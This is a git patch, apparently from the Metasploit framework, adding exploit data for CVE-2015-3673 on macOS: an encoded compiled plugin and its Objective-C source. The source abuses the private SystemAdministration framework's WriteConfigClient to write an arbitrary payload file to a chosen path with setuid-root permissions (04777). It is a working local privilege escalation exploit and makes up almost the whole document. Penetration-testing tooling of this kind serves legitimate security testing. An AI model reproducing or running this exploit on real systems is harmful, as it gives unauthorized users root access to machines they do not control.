From a8b56bb44af776c00634fb57ea920b663f868eaf Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sun, 5 Jul 2015 18:24:45 -0500
Subject: [PATCH] Oops, need to include the binary files.

---
 data/exploits/CVE-2015-3673/exploit.daplug | Bin 0 -> 9384 bytes
 data/exploits/CVE-2015-3673/exploit.m      |  31 +++++++++++++++++++++
 2 files changed, 31 insertions(+)
 create mode 100755 data/exploits/CVE-2015-3673/exploit.daplug
 create mode 100644 data/exploits/CVE-2015-3673/exploit.m

diff --git a/data/exploits/CVE-2015-3673/exploit.daplug b/data/exploits/CVE-2015-3673/exploit.daplug
new file mode 100755
index 0000000000000000000000000000000000000000..35671a51368e6072dff0e98b322d464b846a0eef
GIT binary patch
literal 9384
zcmeHNUu+!38K1)h97xCkiDXnN9ch9>i0mL?6qzRS**R<7Tw;UcCbX)C_1>Is$=&W{
zcMoi&sAsj2d^%Y@@c@V?O9&~Csru0JS4gdh%L7CR0S{H12dFL;NVG3CJmCJmnOS>p
z&o<AfJJReo-@o5{GdnXoH*+6;`_*^1GnVRMjP)YljogRAWl&1@A<x~y80Tkm=g&$}
z=Of+8GR*^%?La0<iSt0r1*)w07~U?WTTN*j@V9Q56H||}oclp-#$Ol3<6GUWRDIfl
z_z;>zy&CT}tyg%wB+6CcK^DhL-=z$XX?x<)EgPvTKFbe0+nLoCaXdrg{aWioJ_PK*
zhLCf2<{67uL{M_fis*{(n#TK71BCq6cs1ua+bM9{DY_EB^L;GuQJ#hdAU+;bh)tAp
zQQ}39LX#=p-nPaI-v{wD=C(>S?pEZuJDEM3jaY@_Z3{}{EgZ|_#rdoo8Ft_|#|z<T
z{6^!V@ev(|oI7Ri&sS#LGOq?+7hYNeg?Plr@xn2u;wzim;bk;XhK!MjkK$2#Y2Jp3
z^NLF^)ed;E=2%_v4Qss6hxjPo&Jajb&aGl}AjkX9(0Iezp7<zU3=Z+gaco!2SwTZD
zj<*<#kNEA!oy7A+*%L)92XVZX#+%fE5Fd>XYm~N720A{gZ2CSS#_?`w>x{-DK8go%
z2Of=MnnRrD$IqO~og5F>&<uo>LhFp=*cCn4=)FeQtNo1CkCI77xuijRBL;mBFm@j5
zDkwoxpV3@fh9fP7%Rf=}ccMIr98Cm6Suep+)q1%K|IPG2f(6y{k8``8_~!Ic=fzV$
zedNvDtLX!f$)??L2V=;GLmre8VNtx~tKRQElu~S9YTge-Wgu_Qc&0Z$Fh)ztbFO#6
z9~gBl*X);T3<(B)E<E3M9e*IJRPa~0$3Qo5-$suDx8{2TWqXFQs-l0Szc3F@y2*G-
zQNMc@;P>M8@pxj)tvLlVKp0yE7PZmwJsquQFV%A-wN1OXuVZvzL$C2W+y6PFo$aR?
z)1QsDp0NjEMenPQ@k49FLz-U%Pw8P~(i7iDgC$8x4<tSCgYSW9qw$5Y@MQ}PF_w-$
zhNbu&T8@q8j(_2^W;B`6$gQ?N#*9bdhOuzz1~qxlZ(kwF((zxyxcwHDn}b;_WJcrK
zRo4DJ1dsf+@jhHWGn$u>2aiAr%}df$O7=_h+*L>yNZQC<H<~;0ByA4vR#@#>1$~=l
z&l9_}?{_k^!BrxSYwZ!`z5;jY*BtynYYr**Ynr`JxmT6@>ss2Q+~0-!CsH#Fq`_CU
z_6s!kjWukGAo~!lMVx;^n<&;rnB<$po`&;dMx)k-(JNBA+n4^At{9E~<{KXvjnm8U
zd^z99wc0NbBr0Xu#&u)qblX^}eGTQ;fE47_JbpqsFQRouGY3+u8;$pj=5)P14L{U>
z#c0-EhM<MYm&Y6Lq8A@0P2=+1+S(eB9;R6F`X0}%?zv36I%DB4^p=11=Qf^f?cjbG
ztQ|ZcpAX9CAw2U-KTd&Ur`8Vs8zHvno5*hd6PP9Xq~81+mFQz}^CK#qpwbFT@$c89
zXFqEOBJ%lGU)^k>g3T#*l<|+|W@>iMvjZ{eIz@YSv}_9}V3XOW@)OyUeEiIMabo%`
z^Gl{D3fji31tr+p76O>|@f$1)f$Q1N%Q~m#9czerqT&W((sSqLS=Dnb;rrwCOGr4+
z+MerFs4jdbg%yms-YGFZ#PFFn&)Go<;RMk76U8yREQXln32G?HQSDIG3`#?0fZu>K
zwLtho%&Apoghw{xP5?ODqHP2AI3${oRry0jS(!g%VP63wwJ*CLlv0%99m&nkqac*O
z(Z6@8jKPEbObXv?8e}r1_Ub~<^G~wWTsoEBb$f4XU9FXykc|Fad05j&H9eted{ekW
z8&{;OT94gdM+)_CYCY{oqbdB|`mxrpYI>{w{g~GDeoYT+I-=<_n$Bw)#ZJme4<tR1
z^gz-BNe?7Fkn}*(14$1gJ&^Q3(gR5k{J-|V-4A4@N2-0*^e<Eo+%wGSD%`X#aI18I
z&(=(@z@E6++Zx7YNkLw^^BLS5<C45}?=YVj`PnER&1a{k_yK-q>LkucSp9mc)vZ}S
z?qGF*p_0)toTQ*8Czz5K<)d`v_M|8ZPdJuf^_A~%tVAjGht}R<fYTAnr0d&rlftXm
zzP$Tk^_DV%S$Cyp<dF-jw>Qz@=x6=Vr{3NG(F5UPCe{;0(=M|XyLbrlLfNefhq$Br
zhSh~;*>x{WS7jSWek_z%{Mjkt6d=<ng+D_00o&Qb>U5wcAE4j<eHX4G<uMJYOmvh(
zCp1qZ({axtG9B%_g^cr1_9c8k*b!v1qibcd+he(vezRIFi+*`!1`+GgwuexT+TIzt
z4vX4_b%&UJQOwwtR)~ExhP`*gr{jt$w2#NK6S1hPDT+j2tI7sZ#QO5F7e%ntewi|O
zf~S6wX%NpSKdJb2``H-(o0$D;ikHW0D6&7s`1fP{M~V;M8T&lO|0iZo$76IFOXp&A
z_C-yjHtFUK$MqSe#>-aYf72P*CES>Nah0ATadC8ZeE(eSSTf{9>5!;JB%C$f^F{x)
OMbDJ3bq2k|*#7{$I&Mb*

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2015-3673/exploit.m b/data/exploits/CVE-2015-3673/exploit.m
new file mode 100644
index 0000000000..dc450487ba
--- /dev/null
+++ b/data/exploits/CVE-2015-3673/exploit.m
@@ -0,0 +1,31 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+}